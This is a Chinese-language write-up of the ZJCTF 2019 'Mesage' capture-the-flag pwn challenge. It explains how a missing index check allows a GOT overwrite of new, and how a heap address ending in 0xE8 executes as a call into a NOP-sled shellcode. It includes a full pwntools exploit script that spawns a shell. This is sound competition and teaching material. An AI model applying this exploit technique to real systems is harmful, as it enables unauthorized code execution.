[ZJCTF 2019]Mesage(地址值强制当成指令)

[ZJCTF 2019]Mesage(地址值强制当成指令)

首先，检查一下程序的保护机制

然后，我们用IDA分析一下，在edit功能里没有检查index，可以溢出，在任意地址处写一个堆地址。

那么，我们就可以把堆地址写到已存在的堆里，然后调用show就能打印出堆地址，然后，我们计算new的got表到堆地址之间的偏移，将new的got表改为一个堆地址。但是这个堆地址里面开始并不是存放shellcode，而是存放着一个堆指针。

通过构造堆，让堆末尾的地址为0xE8，这样，就可以解决问题了，因为0xE8强制转为指令就是这样

因此，我们只要在后方申请一个很大的堆，并在前方大片空间里填充nop，那么就一定可以滑行到主shellcode里

#coding:utf8
from pwn import *

context(os='linux',arch='amd64')
sh = process('./message1')
#sh = remote('node3.buuoj.cn',25086)
new_got = 0x00000000006040F0

def add(count,string):
   sh.sendlineafter('>>','1')
   sh.sendlineafter('add?',str(count))
   for i in range(count):
      sh.sendlineafter('message',string)

def delete(index):
   sh.sendlineafter('>>','2')
   sh.sendlineafter('index:',str(index))

def show():
   sh.sendlineafter('>>','3')

def edit(index,count,string):
   sh.sendlineafter('>>','4')
   sh.sendlineafter('index:',str(index))
   sh.sendlineafter('add?',str(count))
   for i in range(count):
      sh.sendlineafter('message',string)

add(1,'a'*0x8)
edit(-3,1,'a'*0x8)
show()
sh.recvuntil('0:')
sh.recvuntil('0:')
heap_addr = u64(sh.recv(6).ljust(8,'\x00'))
print 'heap_addr=',hex(heap_addr)
offset = (heap_addr - 0x20 - new_got) / 8
edit(0,4,'\x00'*0x18)
edit(0,1,'\x00'*0x18)

#new_got->chunk1[call xxx]->chunk2
edit(-1*offset,1,(asm(shellcraft.sh())).rjust(0x10000,'\x90'))
#getshell
sh.sendlineafter('>>','1')
sh.sendlineafter('add?','1')

sh.interactive()